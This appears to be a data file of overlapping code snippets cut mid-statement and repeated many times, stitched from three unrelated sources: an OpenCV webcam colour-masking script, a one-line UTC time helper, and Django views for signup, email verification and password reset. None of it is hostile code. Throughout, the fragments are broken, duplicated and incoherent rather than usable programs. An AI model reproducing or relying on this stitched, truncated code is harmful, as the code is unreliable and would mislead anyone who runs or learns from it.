"#cv2.imshow(\"Red\", red) #cv2.imshow(\"Blue\", blue) cv2.imshow(\"Green\", green) cv2.imshow(\"Yellow\", yellow) #cv2.imshow(\"Result\", result) key = cv2.waitKey(1)",
"mask = cv2.inRange(hsv_frame, low, high) result = cv2.bitwise_and(frame, frame, mask=mask) #cv2.imshow(\"Frame\", frame) #cv2.imshow(\"Red\",",
"high) result = cv2.bitwise_and(frame, frame, mask=mask) #cv2.imshow(\"Frame\", frame) #cv2.imshow(\"Red\", red) #cv2.imshow(\"Blue\", blue) cv2.imshow(\"Green\",",
"= np.array([21, 39, 64]) high_yellow = np.array([40, 255, 255]) yellow_mask = cv2.inRange(hsv_frame, low_yellow,",
"255, 255]) yellow_mask = cv2.inRange(hsv_frame, low_yellow, high_yellow) yellow = cv2.bitwise_and(frame, frame, mask=yellow_mask) #",
"cv2.inRange(hsv_frame, low_blue, high_blue) blue = cv2.bitwise_and(frame, frame, mask=blue_mask) # Green color low_green =",
"blue) cv2.imshow(\"Green\", green) cv2.imshow(\"Yellow\", yellow) #cv2.imshow(\"Result\", result) key = cv2.waitKey(1) if key ==",
"cv2.bitwise_and(frame, frame, mask=blue_mask) # Green color low_green = np.array([25, 52, 72]) high_green =",
"= cv2.inRange(hsv_frame, low_blue, high_blue) blue = cv2.bitwise_and(frame, frame, mask=blue_mask) # Green color low_green",
"# Red color low_red = np.array([161, 155, 84]) high_red = np.array([179, 255, 255])",
"color except white low = np.array([0, 42, 0]) high = np.array([179, 255, 255])",
"= cv2.VideoCapture(0) while True: _, frame = cap.read() hsv_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV) #",
"high_blue = np.array([126, 255, 255]) blue_mask = cv2.inRange(hsv_frame, low_blue, high_blue) blue = cv2.bitwise_and(frame,",
"green_mask = cv2.inRange(hsv_frame, low_green, high_green) green = cv2.bitwise_and(frame, frame, mask=green_mask) #yellow low_yellow =",
"frame, mask=red_mask) # Blue color low_blue = np.array([94, 80, 2]) high_blue = np.array([126,",
"cv2.bitwise_and(frame, frame, mask=green_mask) #yellow low_yellow = np.array([21, 39, 64]) high_yellow = np.array([40, 255,",
"64]) high_yellow = np.array([40, 255, 255]) yellow_mask = cv2.inRange(hsv_frame, low_yellow, high_yellow) yellow =",
"cv2.bitwise_and(frame, frame, mask=red_mask) # Blue color low_blue = np.array([94, 80, 2]) high_blue =",
"255]) green_mask = cv2.inRange(hsv_frame, low_green, high_green) green = cv2.bitwise_and(frame, frame, mask=green_mask) #yellow low_yellow",
"as np cap = cv2.VideoCapture(0) while True: _, frame = cap.read() hsv_frame =",
"mask=green_mask) #yellow low_yellow = np.array([21, 39, 64]) high_yellow = np.array([40, 255, 255]) yellow_mask",
"yellow = cv2.bitwise_and(frame, frame, mask=yellow_mask) # Every color except white low = np.array([0,",
"39, 64]) high_yellow = np.array([40, 255, 255]) yellow_mask = cv2.inRange(hsv_frame, low_yellow, high_yellow) yellow",
"= cv2.bitwise_and(frame, frame, mask=yellow_mask) # Every color except white low = np.array([0, 42,",
"np.array([21, 39, 64]) high_yellow = np.array([40, 255, 255]) yellow_mask = cv2.inRange(hsv_frame, low_yellow, high_yellow)",
"white low = np.array([0, 42, 0]) high = np.array([179, 255, 255]) mask =",
"high_yellow = np.array([40, 255, 255]) yellow_mask = cv2.inRange(hsv_frame, low_yellow, high_yellow) yellow = cv2.bitwise_and(frame,",
"low_yellow, high_yellow) yellow = cv2.bitwise_and(frame, frame, mask=yellow_mask) # Every color except white low",
"= cv2.inRange(hsv_frame, low_yellow, high_yellow) yellow = cv2.bitwise_and(frame, frame, mask=yellow_mask) # Every color except",
"frame = cap.read() hsv_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV) # Red color low_red = np.array([161,",
"np.array([161, 155, 84]) high_red = np.array([179, 255, 255]) red_mask = cv2.inRange(hsv_frame, low_red, high_red)",
"True: _, frame = cap.read() hsv_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV) # Red color low_red",
"low_blue = np.array([94, 80, 2]) high_blue = np.array([126, 255, 255]) blue_mask = cv2.inRange(hsv_frame,",
"#cv2.imshow(\"Blue\", blue) cv2.imshow(\"Green\", green) cv2.imshow(\"Yellow\", yellow) #cv2.imshow(\"Result\", result) key = cv2.waitKey(1) if key",
"low_blue, high_blue) blue = cv2.bitwise_and(frame, frame, mask=blue_mask) # Green color low_green = np.array([25,",
"frame) #cv2.imshow(\"Red\", red) #cv2.imshow(\"Blue\", blue) cv2.imshow(\"Green\", green) cv2.imshow(\"Yellow\", yellow) #cv2.imshow(\"Result\", result) key =",
"_, frame = cap.read() hsv_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV) # Red color low_red =",
"255, 255]) red_mask = cv2.inRange(hsv_frame, low_red, high_red) red = cv2.bitwise_and(frame, frame, mask=red_mask) #",
"= cv2.inRange(hsv_frame, low_red, high_red) red = cv2.bitwise_and(frame, frame, mask=red_mask) # Blue color low_blue",
"green = cv2.bitwise_and(frame, frame, mask=green_mask) #yellow low_yellow = np.array([21, 39, 64]) high_yellow =",
"except white low = np.array([0, 42, 0]) high = np.array([179, 255, 255]) mask",
"cv2.inRange(hsv_frame, low_red, high_red) red = cv2.bitwise_and(frame, frame, mask=red_mask) # Blue color low_blue =",
"mask=blue_mask) # Green color low_green = np.array([25, 52, 72]) high_green = np.array([102, 255,",
"frame, mask=mask) #cv2.imshow(\"Frame\", frame) #cv2.imshow(\"Red\", red) #cv2.imshow(\"Blue\", blue) cv2.imshow(\"Green\", green) cv2.imshow(\"Yellow\", yellow) #cv2.imshow(\"Result\",",
"high_yellow) yellow = cv2.bitwise_and(frame, frame, mask=yellow_mask) # Every color except white low =",
"frame, mask=green_mask) #yellow low_yellow = np.array([21, 39, 64]) high_yellow = np.array([40, 255, 255])",
"import numpy as np cap = cv2.VideoCapture(0) while True: _, frame = cap.read()",
"hsv_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV) # Red color low_red = np.array([161, 155, 84]) high_red",
"blue_mask = cv2.inRange(hsv_frame, low_blue, high_blue) blue = cv2.bitwise_and(frame, frame, mask=blue_mask) # Green color",
"low_red, high_red) red = cv2.bitwise_and(frame, frame, mask=red_mask) # Blue color low_blue = np.array([94,",
"result = cv2.bitwise_and(frame, frame, mask=mask) #cv2.imshow(\"Frame\", frame) #cv2.imshow(\"Red\", red) #cv2.imshow(\"Blue\", blue) cv2.imshow(\"Green\", green)",
"# Blue color low_blue = np.array([94, 80, 2]) high_blue = np.array([126, 255, 255])",
"255]) yellow_mask = cv2.inRange(hsv_frame, low_yellow, high_yellow) yellow = cv2.bitwise_and(frame, frame, mask=yellow_mask) # Every",
"high_red) red = cv2.bitwise_and(frame, frame, mask=red_mask) # Blue color low_blue = np.array([94, 80,",
"255]) red_mask = cv2.inRange(hsv_frame, low_red, high_red) red = cv2.bitwise_and(frame, frame, mask=red_mask) # Blue",
"while True: _, frame = cap.read() hsv_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV) # Red color",
"import cv2 import numpy as np cap = cv2.VideoCapture(0) while True: _, frame",
"green) cv2.imshow(\"Yellow\", yellow) #cv2.imshow(\"Result\", result) key = cv2.waitKey(1) if key == 27: break",
"cv2.VideoCapture(0) while True: _, frame = cap.read() hsv_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV) # Red",
"cv2.bitwise_and(frame, frame, mask=yellow_mask) # Every color except white low = np.array([0, 42, 0])",
"= np.array([126, 255, 255]) blue_mask = cv2.inRange(hsv_frame, low_blue, high_blue) blue = cv2.bitwise_and(frame, frame,",
"= cv2.inRange(hsv_frame, low_green, high_green) green = cv2.bitwise_and(frame, frame, mask=green_mask) #yellow low_yellow = np.array([21,",
"np.array([40, 255, 255]) yellow_mask = cv2.inRange(hsv_frame, low_yellow, high_yellow) yellow = cv2.bitwise_and(frame, frame, mask=yellow_mask)",
"255, 255]) green_mask = cv2.inRange(hsv_frame, low_green, high_green) green = cv2.bitwise_and(frame, frame, mask=green_mask) #yellow",
"= cv2.bitwise_and(frame, frame, mask=red_mask) # Blue color low_blue = np.array([94, 80, 2]) high_blue",
"low, high) result = cv2.bitwise_and(frame, frame, mask=mask) #cv2.imshow(\"Frame\", frame) #cv2.imshow(\"Red\", red) #cv2.imshow(\"Blue\", blue)",
"cv2 import numpy as np cap = cv2.VideoCapture(0) while True: _, frame =",
"255, 255]) blue_mask = cv2.inRange(hsv_frame, low_blue, high_blue) blue = cv2.bitwise_and(frame, frame, mask=blue_mask) #",
"42, 0]) high = np.array([179, 255, 255]) mask = cv2.inRange(hsv_frame, low, high) result",
"#cv2.imshow(\"Frame\", frame) #cv2.imshow(\"Red\", red) #cv2.imshow(\"Blue\", blue) cv2.imshow(\"Green\", green) cv2.imshow(\"Yellow\", yellow) #cv2.imshow(\"Result\", result) key",
"mask=mask) #cv2.imshow(\"Frame\", frame) #cv2.imshow(\"Red\", red) #cv2.imshow(\"Blue\", blue) cv2.imshow(\"Green\", green) cv2.imshow(\"Yellow\", yellow) #cv2.imshow(\"Result\", result)",
"= cv2.bitwise_and(frame, frame, mask=green_mask) #yellow low_yellow = np.array([21, 39, 64]) high_yellow = np.array([40,",
"= cv2.cvtColor(frame, cv2.COLOR_BGR2HSV) # Red color low_red = np.array([161, 155, 84]) high_red =",
"= np.array([0, 42, 0]) high = np.array([179, 255, 255]) mask = cv2.inRange(hsv_frame, low,",
"numpy as np cap = cv2.VideoCapture(0) while True: _, frame = cap.read() hsv_frame",
"= np.array([94, 80, 2]) high_blue = np.array([126, 255, 255]) blue_mask = cv2.inRange(hsv_frame, low_blue,",
"np.array([25, 52, 72]) high_green = np.array([102, 255, 255]) green_mask = cv2.inRange(hsv_frame, low_green, high_green)",
"52, 72]) high_green = np.array([102, 255, 255]) green_mask = cv2.inRange(hsv_frame, low_green, high_green) green",
"72]) high_green = np.array([102, 255, 255]) green_mask = cv2.inRange(hsv_frame, low_green, high_green) green =",
"cv2.inRange(hsv_frame, low_green, high_green) green = cv2.bitwise_and(frame, frame, mask=green_mask) #yellow low_yellow = np.array([21, 39,",
"255]) mask = cv2.inRange(hsv_frame, low, high) result = cv2.bitwise_and(frame, frame, mask=mask) #cv2.imshow(\"Frame\", frame)",
"#yellow low_yellow = np.array([21, 39, 64]) high_yellow = np.array([40, 255, 255]) yellow_mask =",
"= np.array([102, 255, 255]) green_mask = cv2.inRange(hsv_frame, low_green, high_green) green = cv2.bitwise_and(frame, frame,",
"cv2.bitwise_and(frame, frame, mask=mask) #cv2.imshow(\"Frame\", frame) #cv2.imshow(\"Red\", red) #cv2.imshow(\"Blue\", blue) cv2.imshow(\"Green\", green) cv2.imshow(\"Yellow\", yellow)",
"low_green, high_green) green = cv2.bitwise_and(frame, frame, mask=green_mask) #yellow low_yellow = np.array([21, 39, 64])"
] |
[
"# -*- coding: utf-8 -*- from datetime import datetime def utcnow(): return datetime.utcnow()",
"<reponame>robzzy/articles-service<gh_stars>0 # -*- coding: utf-8 -*- from datetime import datetime def utcnow(): return"
] |
[
"\"We have sent a password reset link. Please check your email.\") return shortcuts.redirect(settings.LOGIN_REDIRECT_URL)",
"else: form = forms.UserCreationForm() return render(request, 'registration/signup.html', {'form': form}) def verify(request): if request.GET.get('token')",
"is not None: payload = {'token': request.GET.get('token')} headers = {'Content-type': 'application/json'} res =",
"django import shortcuts from django.conf import settings from . import forms import requests",
"Verified! Please log in.') return redirect('/auth/login') raise Http404() def reset_password(request): if request.user.is_authenticated(): return",
"django.http import Http404 from django.shortcuts import redirect from django.contrib import messages @sensitive_post_parameters() @csrf_protect",
"'password': password} headers = {'Content-type': 'application/json'} res = requests.post(settings.PASSWORD_UPDATE_URL, data=json.dumps(payload), headers=headers) if res.status_code",
"from django.http import Http404 from django.shortcuts import redirect from django.contrib import messages @sensitive_post_parameters()",
"if request.GET.get('token') is not None: payload = {'token': request.GET.get('token')} headers = {'Content-type': 'application/json'}",
"= forms.UserPasswordUpdateForm(request.POST) if form.is_valid(): token = request.path.rsplit('/', 1)[-1] password = form.cleaned_data['<PASSWORD>'] payload =",
"form.is_valid(): messages.success(request, \"We have sent a password reset link. Please check your email.\")",
"requests.post(settings.EMAIL_VERIFICATION_URL, data=json.dumps(payload), headers=headers) if res.status_code == 200: messages.success(request, 'Email Address Verified! Please log",
"@sensitive_post_parameters() @csrf_protect @never_cache def signup(request): if request.user.is_authenticated(): return shortcuts.redirect(settings.LOGIN_REDIRECT_URL) if request.method == 'POST':",
"successfully. Please log in.\") else: messages.error(request, \"That reset link does not exist or",
"return shortcuts.redirect(settings.LOGIN_REDIRECT_URL) if request.method == 'POST': form = forms.UserCreationForm(request.POST) if form.is_valid(): messages.success(request, 'Successfully",
"'POST': form = forms.UserResetPasswordForm(request.POST) if form.is_valid(): messages.success(request, \"We have sent a password reset",
"request.user.is_authenticated(): return shortcuts.redirect(settings.LOGIN_REDIRECT_URL) if request.method == 'POST': form = forms.UserCreationForm(request.POST) if form.is_valid(): messages.success(request,",
"if request.method == 'POST': form = forms.UserResetPasswordForm(request.POST) if form.is_valid(): messages.success(request, \"We have sent",
"password link by going to the reset password page.\") return redirect('/auth/login') else: form",
"password} headers = {'Content-type': 'application/json'} res = requests.post(settings.PASSWORD_UPDATE_URL, data=json.dumps(payload), headers=headers) if res.status_code ==",
"from django.conf.urls import url from django.http import HttpResponse from django.views.decorators.csrf import csrf_protect from",
"Http404 from django.shortcuts import redirect from django.contrib import messages @sensitive_post_parameters() @csrf_protect @never_cache def",
"form = forms.UserCreationForm() return render(request, 'registration/signup.html', {'form': form}) def verify(request): if request.GET.get('token') is",
"None: payload = {'token': request.GET.get('token')} headers = {'Content-type': 'application/json'} res = requests.post(settings.EMAIL_VERIFICATION_URL, data=json.dumps(payload),",
"else: form = forms.UserResetPasswordForm() return render(request, 'registration/reset_password.html', {'form': form}) @sensitive_post_parameters() @csrf_protect @never_cache def",
"forms.UserPasswordUpdateForm(request.POST) if form.is_valid(): token = request.path.rsplit('/', 1)[-1] password = form.cleaned_data['<PASSWORD>'] payload = {'token':",
"your account before logging in.') return shortcuts.redirect(settings.LOGIN_REDIRECT_URL) else: form = forms.UserCreationForm() return render(request,",
"redirect('/auth/login') raise Http404() def reset_password(request): if request.user.is_authenticated(): return shortcuts.redirect(settings.LOGIN_REDIRECT_URL) if request.method == 'POST':",
"new reset password link by going to the reset password page.\") return redirect('/auth/login')",
"import requests import json from django.http import Http404 from django.shortcuts import redirect from",
"'POST': form = forms.UserCreationForm(request.POST) if form.is_valid(): messages.success(request, 'Successfully created account. Please check your",
"django.shortcuts import render from django.conf.urls import url from django.http import HttpResponse from django.views.decorators.csrf",
"import redirect from django.contrib import messages @sensitive_post_parameters() @csrf_protect @never_cache def signup(request): if request.user.is_authenticated():",
"from django.contrib import messages @sensitive_post_parameters() @csrf_protect @never_cache def signup(request): if request.user.is_authenticated(): return shortcuts.redirect(settings.LOGIN_REDIRECT_URL)",
"import settings from . import forms import requests import json from django.http import",
"= form.cleaned_data['<PASSWORD>'] payload = {'token': token, 'password': password} headers = {'Content-type': 'application/json'} res",
"if form.is_valid(): messages.success(request, 'Successfully created account. Please check your email to verify your",
"from django.conf import settings from . import forms import requests import json from",
"form = forms.UserResetPasswordForm() return render(request, 'registration/reset_password.html', {'form': form}) @sensitive_post_parameters() @csrf_protect @never_cache def password_update(request):",
"payload = {'token': token, 'password': password} headers = {'Content-type': 'application/json'} res = requests.post(settings.PASSWORD_UPDATE_URL,",
"\"Password updated successfully. Please log in.\") else: messages.error(request, \"That reset link does not",
"import json from django.http import Http404 from django.shortcuts import redirect from django.contrib import",
"account before logging in.') return shortcuts.redirect(settings.LOGIN_REDIRECT_URL) else: form = forms.UserCreationForm() return render(request, 'registration/signup.html',",
"if res.status_code == 200: messages.success(request, \"Password updated successfully. Please log in.\") else: messages.error(request,",
"== 'POST': form = forms.UserResetPasswordForm(request.POST) if form.is_valid(): messages.success(request, \"We have sent a password",
"by going to the reset password page.\") return redirect('/auth/login') else: form = forms.UserPasswordUpdateForm()",
"= forms.UserCreationForm() return render(request, 'registration/signup.html', {'form': form}) def verify(request): if request.GET.get('token') is not",
"Please log in.') return redirect('/auth/login') raise Http404() def reset_password(request): if request.user.is_authenticated(): return shortcuts.redirect(settings.LOGIN_REDIRECT_URL)",
"verify your account before logging in.') return shortcuts.redirect(settings.LOGIN_REDIRECT_URL) else: form = forms.UserCreationForm() return",
"settings from . import forms import requests import json from django.http import Http404",
"request.method == 'POST': form = forms.UserCreationForm(request.POST) if form.is_valid(): messages.success(request, 'Successfully created account. Please",
"render(request, 'registration/reset_password.html', {'form': form}) @sensitive_post_parameters() @csrf_protect @never_cache def password_update(request): if request.user.is_authenticated(): return shortcuts.redirect(settings.LOGIN_REDIRECT_URL)",
"your email.\") return shortcuts.redirect(settings.LOGIN_REDIRECT_URL) else: form = forms.UserResetPasswordForm() return render(request, 'registration/reset_password.html', {'form': form})",
"messages.success(request, \"Password updated successfully. Please log in.\") else: messages.error(request, \"That reset link does",
"email.\") return shortcuts.redirect(settings.LOGIN_REDIRECT_URL) else: form = forms.UserResetPasswordForm() return render(request, 'registration/reset_password.html', {'form': form}) @sensitive_post_parameters()",
"Please check your email to verify your account before logging in.') return shortcuts.redirect(settings.LOGIN_REDIRECT_URL)",
"return shortcuts.redirect(settings.LOGIN_REDIRECT_URL) if request.method == 'POST': form = forms.UserResetPasswordForm(request.POST) if form.is_valid(): messages.success(request, \"We",
"request.user.is_authenticated(): return shortcuts.redirect(settings.LOGIN_REDIRECT_URL) if request.method == 'POST': form = forms.UserResetPasswordForm(request.POST) if form.is_valid(): messages.success(request,",
"messages.success(request, \"We have sent a password reset link. Please check your email.\") return",
"a password reset link. Please check your email.\") return shortcuts.redirect(settings.LOGIN_REDIRECT_URL) else: form =",
"= forms.UserCreationForm(request.POST) if form.is_valid(): messages.success(request, 'Successfully created account. Please check your email to",
"{'form': form}) @sensitive_post_parameters() @csrf_protect @never_cache def password_update(request): if request.user.is_authenticated(): return shortcuts.redirect(settings.LOGIN_REDIRECT_URL) if request.method",
"token = request.path.rsplit('/', 1)[-1] password = form.cleaned_data['<PASSWORD>'] payload = {'token': token, 'password': password}",
"@sensitive_post_parameters() @csrf_protect @never_cache def password_update(request): if request.user.is_authenticated(): return shortcuts.redirect(settings.LOGIN_REDIRECT_URL) if request.method == 'POST':",
"return redirect('/auth/login') raise Http404() def reset_password(request): if request.user.is_authenticated(): return shortcuts.redirect(settings.LOGIN_REDIRECT_URL) if request.method ==",
"logging in.') return shortcuts.redirect(settings.LOGIN_REDIRECT_URL) else: form = forms.UserCreationForm() return render(request, 'registration/signup.html', {'form': form})",
"headers = {'Content-type': 'application/json'} res = requests.post(settings.EMAIL_VERIFICATION_URL, data=json.dumps(payload), headers=headers) if res.status_code == 200:",
"not exist or has expired. Please request a new reset password link by",
"url from django.http import HttpResponse from django.views.decorators.csrf import csrf_protect from django.views.decorators.debug import sensitive_post_parameters",
"return shortcuts.redirect(settings.LOGIN_REDIRECT_URL) else: form = forms.UserCreationForm() return render(request, 'registration/signup.html', {'form': form}) def verify(request):",
"def verify(request): if request.GET.get('token') is not None: payload = {'token': request.GET.get('token')} headers =",
"or has expired. Please request a new reset password link by going to",
"import HttpResponse from django.views.decorators.csrf import csrf_protect from django.views.decorators.debug import sensitive_post_parameters from django.views.decorators.cache import",
"requests import json from django.http import Http404 from django.shortcuts import redirect from django.contrib",
"csrf_protect from django.views.decorators.debug import sensitive_post_parameters from django.views.decorators.cache import never_cache from django import shortcuts",
"created account. Please check your email to verify your account before logging in.')",
"{'form': form}) def verify(request): if request.GET.get('token') is not None: payload = {'token': request.GET.get('token')}",
"Please check your email.\") return shortcuts.redirect(settings.LOGIN_REDIRECT_URL) else: form = forms.UserResetPasswordForm() return render(request, 'registration/reset_password.html',",
"forms.UserResetPasswordForm() return render(request, 'registration/reset_password.html', {'form': form}) @sensitive_post_parameters() @csrf_protect @never_cache def password_update(request): if request.user.is_authenticated():",
"@csrf_protect @never_cache def password_update(request): if request.user.is_authenticated(): return shortcuts.redirect(settings.LOGIN_REDIRECT_URL) if request.method == 'POST': form",
"'Email Address Verified! Please log in.') return redirect('/auth/login') raise Http404() def reset_password(request): if",
"Please log in.\") else: messages.error(request, \"That reset link does not exist or has",
"forms.UserCreationForm() return render(request, 'registration/signup.html', {'form': form}) def verify(request): if request.GET.get('token') is not None:",
"return render(request, 'registration/signup.html', {'form': form}) def verify(request): if request.GET.get('token') is not None: payload",
"django.views.decorators.cache import never_cache from django import shortcuts from django.conf import settings from .",
"import csrf_protect from django.views.decorators.debug import sensitive_post_parameters from django.views.decorators.cache import never_cache from django import",
"form = forms.UserPasswordUpdateForm(request.POST) if form.is_valid(): token = request.path.rsplit('/', 1)[-1] password = form.cleaned_data['<PASSWORD>'] payload",
"{'token': request.GET.get('token')} headers = {'Content-type': 'application/json'} res = requests.post(settings.EMAIL_VERIFICATION_URL, data=json.dumps(payload), headers=headers) if res.status_code",
"form = forms.UserResetPasswordForm(request.POST) if form.is_valid(): messages.success(request, \"We have sent a password reset link.",
"messages.success(request, 'Successfully created account. Please check your email to verify your account before",
"= {'token': request.GET.get('token')} headers = {'Content-type': 'application/json'} res = requests.post(settings.EMAIL_VERIFICATION_URL, data=json.dumps(payload), headers=headers) if",
"in.') return redirect('/auth/login') raise Http404() def reset_password(request): if request.user.is_authenticated(): return shortcuts.redirect(settings.LOGIN_REDIRECT_URL) if request.method",
"expired. Please request a new reset password link by going to the reset",
"link by going to the reset password page.\") return redirect('/auth/login') else: form =",
"verify(request): if request.GET.get('token') is not None: payload = {'token': request.GET.get('token')} headers = {'Content-type':",
"form}) @sensitive_post_parameters() @csrf_protect @never_cache def password_update(request): if request.user.is_authenticated(): return shortcuts.redirect(settings.LOGIN_REDIRECT_URL) if request.method ==",
"django.views.decorators.debug import sensitive_post_parameters from django.views.decorators.cache import never_cache from django import shortcuts from django.conf",
"request.path.rsplit('/', 1)[-1] password = form.cleaned_data['<PASSWORD>'] payload = {'token': token, 'password': password} headers =",
"return shortcuts.redirect(settings.LOGIN_REDIRECT_URL) if request.method == 'POST': form = forms.UserPasswordUpdateForm(request.POST) if form.is_valid(): token =",
"password reset link. Please check your email.\") return shortcuts.redirect(settings.LOGIN_REDIRECT_URL) else: form = forms.UserResetPasswordForm()",
"form.is_valid(): messages.success(request, 'Successfully created account. Please check your email to verify your account",
"request a new reset password link by going to the reset password page.\")",
"request.method == 'POST': form = forms.UserResetPasswordForm(request.POST) if form.is_valid(): messages.success(request, \"We have sent a",
"@never_cache def password_update(request): if request.user.is_authenticated(): return shortcuts.redirect(settings.LOGIN_REDIRECT_URL) if request.method == 'POST': form =",
"json from django.http import Http404 from django.shortcuts import redirect from django.contrib import messages",
"password page.\") return redirect('/auth/login') else: form = forms.UserPasswordUpdateForm() return render(request, 'registration/password_update.html', {'form': form})",
"1)[-1] password = form.cleaned_data['<PASSWORD>'] payload = {'token': token, 'password': password} headers = {'Content-type':",
"password = form.cleaned_data['<PASSWORD>'] payload = {'token': token, 'password': password} headers = {'Content-type': 'application/json'}",
"your email to verify your account before logging in.') return shortcuts.redirect(settings.LOGIN_REDIRECT_URL) else: form",
"have sent a password reset link. Please check your email.\") return shortcuts.redirect(settings.LOGIN_REDIRECT_URL) else:",
"shortcuts.redirect(settings.LOGIN_REDIRECT_URL) if request.method == 'POST': form = forms.UserPasswordUpdateForm(request.POST) if form.is_valid(): token = request.path.rsplit('/',",
"link does not exist or has expired. Please request a new reset password",
"reset_password(request): if request.user.is_authenticated(): return shortcuts.redirect(settings.LOGIN_REDIRECT_URL) if request.method == 'POST': form = forms.UserResetPasswordForm(request.POST) if",
"def password_update(request): if request.user.is_authenticated(): return shortcuts.redirect(settings.LOGIN_REDIRECT_URL) if request.method == 'POST': form = forms.UserPasswordUpdateForm(request.POST)",
"headers = {'Content-type': 'application/json'} res = requests.post(settings.PASSWORD_UPDATE_URL, data=json.dumps(payload), headers=headers) if res.status_code == 200:",
"redirect from django.contrib import messages @sensitive_post_parameters() @csrf_protect @never_cache def signup(request): if request.user.is_authenticated(): return",
"forms.UserCreationForm(request.POST) if form.is_valid(): messages.success(request, 'Successfully created account. Please check your email to verify",
"import sensitive_post_parameters from django.views.decorators.cache import never_cache from django import shortcuts from django.conf import",
"import Http404 from django.shortcuts import redirect from django.contrib import messages @sensitive_post_parameters() @csrf_protect @never_cache",
"from django.shortcuts import redirect from django.contrib import messages @sensitive_post_parameters() @csrf_protect @never_cache def signup(request):",
"form.is_valid(): token = request.path.rsplit('/', 1)[-1] password = form.cleaned_data['<PASSWORD>'] payload = {'token': token, 'password':",
"email to verify your account before logging in.') return shortcuts.redirect(settings.LOGIN_REDIRECT_URL) else: form =",
"django.shortcuts import redirect from django.contrib import messages @sensitive_post_parameters() @csrf_protect @never_cache def signup(request): if",
"shortcuts.redirect(settings.LOGIN_REDIRECT_URL) if request.method == 'POST': form = forms.UserResetPasswordForm(request.POST) if form.is_valid(): messages.success(request, \"We have",
"messages @sensitive_post_parameters() @csrf_protect @never_cache def signup(request): if request.user.is_authenticated(): return shortcuts.redirect(settings.LOGIN_REDIRECT_URL) if request.method ==",
"shortcuts.redirect(settings.LOGIN_REDIRECT_URL) if request.method == 'POST': form = forms.UserCreationForm(request.POST) if form.is_valid(): messages.success(request, 'Successfully created",
"if res.status_code == 200: messages.success(request, 'Email Address Verified! Please log in.') return redirect('/auth/login')",
"headers=headers) if res.status_code == 200: messages.success(request, 'Email Address Verified! Please log in.') return",
"'application/json'} res = requests.post(settings.PASSWORD_UPDATE_URL, data=json.dumps(payload), headers=headers) if res.status_code == 200: messages.success(request, \"Password updated",
"request.user.is_authenticated(): return shortcuts.redirect(settings.LOGIN_REDIRECT_URL) if request.method == 'POST': form = forms.UserPasswordUpdateForm(request.POST) if form.is_valid(): token",
"exist or has expired. Please request a new reset password link by going",
"== 'POST': form = forms.UserPasswordUpdateForm(request.POST) if form.is_valid(): token = request.path.rsplit('/', 1)[-1] password =",
"token, 'password': password} headers = {'Content-type': 'application/json'} res = requests.post(settings.PASSWORD_UPDATE_URL, data=json.dumps(payload), headers=headers) if",
"form = forms.UserCreationForm(request.POST) if form.is_valid(): messages.success(request, 'Successfully created account. Please check your email",
"'application/json'} res = requests.post(settings.EMAIL_VERIFICATION_URL, data=json.dumps(payload), headers=headers) if res.status_code == 200: messages.success(request, 'Email Address",
"if request.user.is_authenticated(): return shortcuts.redirect(settings.LOGIN_REDIRECT_URL) if request.method == 'POST': form = forms.UserCreationForm(request.POST) if form.is_valid():",
"django.conf import settings from . import forms import requests import json from django.http",
"to verify your account before logging in.') return shortcuts.redirect(settings.LOGIN_REDIRECT_URL) else: form = forms.UserCreationForm()",
"== 200: messages.success(request, 'Email Address Verified! Please log in.') return redirect('/auth/login') raise Http404()",
"= {'Content-type': 'application/json'} res = requests.post(settings.PASSWORD_UPDATE_URL, data=json.dumps(payload), headers=headers) if res.status_code == 200: messages.success(request,",
"from django.http import HttpResponse from django.views.decorators.csrf import csrf_protect from django.views.decorators.debug import sensitive_post_parameters from",
"in.') return shortcuts.redirect(settings.LOGIN_REDIRECT_URL) else: form = forms.UserCreationForm() return render(request, 'registration/signup.html', {'form': form}) def",
"request.GET.get('token')} headers = {'Content-type': 'application/json'} res = requests.post(settings.EMAIL_VERIFICATION_URL, data=json.dumps(payload), headers=headers) if res.status_code ==",
"link. Please check your email.\") return shortcuts.redirect(settings.LOGIN_REDIRECT_URL) else: form = forms.UserResetPasswordForm() return render(request,",
"res = requests.post(settings.PASSWORD_UPDATE_URL, data=json.dumps(payload), headers=headers) if res.status_code == 200: messages.success(request, \"Password updated successfully.",
"shortcuts.redirect(settings.LOGIN_REDIRECT_URL) else: form = forms.UserResetPasswordForm() return render(request, 'registration/reset_password.html', {'form': form}) @sensitive_post_parameters() @csrf_protect @never_cache",
"shortcuts.redirect(settings.LOGIN_REDIRECT_URL) else: form = forms.UserCreationForm() return render(request, 'registration/signup.html', {'form': form}) def verify(request): if",
"to the reset password page.\") return redirect('/auth/login') else: form = forms.UserPasswordUpdateForm() return render(request,",
"log in.\") else: messages.error(request, \"That reset link does not exist or has expired.",
"@never_cache def signup(request): if request.user.is_authenticated(): return shortcuts.redirect(settings.LOGIN_REDIRECT_URL) if request.method == 'POST': form =",
"check your email.\") return shortcuts.redirect(settings.LOGIN_REDIRECT_URL) else: form = forms.UserResetPasswordForm() return render(request, 'registration/reset_password.html', {'form':",
"messages.error(request, \"That reset link does not exist or has expired. Please request a",
"django.http import HttpResponse from django.views.decorators.csrf import csrf_protect from django.views.decorators.debug import sensitive_post_parameters from django.views.decorators.cache",
"from django.views.decorators.cache import never_cache from django import shortcuts from django.conf import settings from",
"not None: payload = {'token': request.GET.get('token')} headers = {'Content-type': 'application/json'} res = requests.post(settings.EMAIL_VERIFICATION_URL,",
"res = requests.post(settings.EMAIL_VERIFICATION_URL, data=json.dumps(payload), headers=headers) if res.status_code == 200: messages.success(request, 'Email Address Verified!",
"import forms import requests import json from django.http import Http404 from django.shortcuts import",
"{'Content-type': 'application/json'} res = requests.post(settings.PASSWORD_UPDATE_URL, data=json.dumps(payload), headers=headers) if res.status_code == 200: messages.success(request, \"Password",
"log in.') return redirect('/auth/login') raise Http404() def reset_password(request): if request.user.is_authenticated(): return shortcuts.redirect(settings.LOGIN_REDIRECT_URL) if",
"render(request, 'registration/signup.html', {'form': form}) def verify(request): if request.GET.get('token') is not None: payload =",
"the reset password page.\") return redirect('/auth/login') else: form = forms.UserPasswordUpdateForm() return render(request, 'registration/password_update.html',",
